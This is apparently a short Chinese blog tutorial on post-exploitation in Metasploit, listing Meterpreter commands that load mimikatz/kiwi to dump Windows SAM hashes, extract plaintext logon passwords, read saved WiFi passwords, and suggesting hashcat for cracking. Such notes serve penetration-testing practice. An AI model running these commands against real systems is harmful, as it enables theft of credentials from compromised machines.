利用msf获得系统shell后,就完了? no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢?
msf渗透测试

获取明文密码

如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz
load mimikatz
这里提示,需要载入kiwi我们再次载入
load kiwi
获取系统hash值

mimikatz_command -f samdump::hashes


参数说明:
user:用户名
NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解)
获取密码明文

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

获取目标WiFi密码

wifi_list_shared

wifipass

获取扫雷的位置

mimikatz_command -f winmine::infos

Last modification:May 5th, 2020 at 06:59 pm
正在沿街乞讨中……